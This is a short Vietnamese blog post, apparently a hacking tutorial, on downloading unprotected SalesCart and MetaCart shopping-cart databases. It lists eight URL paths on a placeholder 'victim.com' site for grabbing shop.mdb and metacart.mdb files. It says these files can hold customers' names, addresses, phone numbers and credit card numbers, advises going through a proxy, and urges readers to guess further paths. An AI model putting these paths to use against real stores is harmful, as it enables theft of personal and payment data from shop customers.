SalesCart Database Storage Insecurity :
Tổng quát : Lỗi này thực chất là dữ liệu của các chương trình mua bán không được bảo mật , mã hóa hay cất giữ cẩn thận => Bạn hoàn toàn có thể lấy chúng một cách dễ dàng
.
Lưu ý : Đôi khi với thực tế , 1 số link có thể khác đi . Không phải lúc nào cũng hoàn toàn đúng.
Dữ liệu có khi bao gồm cả CRD ( Credit Card ) nên mọi việc phải qua proxy ( nếu không có proxy thì có thể ra dịch vụ ...)
Khai thác :
Hãy sử dụng 1 trong những link sau :
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
--------------------
Có nghĩa là database không hề có 1 chút bảo mật nào cả . Download vô tư . Trong database có thể bao gồm : name, surname, address, e-mail, phone number, credit card
number, and company name . Bạn có thể khai thác dữ liệu này . Nhưng trong thực tế , mọi việc không phải lúc nào cũng suôn sẽ cả . Bạn hãy tưởng tượng mỗi server có một cấu trúc riêng . ví dụ như đường dẫn không phải lúc nào cũng là fpdb/... hay như những link trên . Hãy tận dụng lỗi và thử từng cái một , nhiều khi là www.victim.com/muaban/fpdb/shop.mdb thì sao ? Cứ thử đi .. rồi bạn sẽ khai thác được nhiều
0 nhận xét:
Đăng nhận xét